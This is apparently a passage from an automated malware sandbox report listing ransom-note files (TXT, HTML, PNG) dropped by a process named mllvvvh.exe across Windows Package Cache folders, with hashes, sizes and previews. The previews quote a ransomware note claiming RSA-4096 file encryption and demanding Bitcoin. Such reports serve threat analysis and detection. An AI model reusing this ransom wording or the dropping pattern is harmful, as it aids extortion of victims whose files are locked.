                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
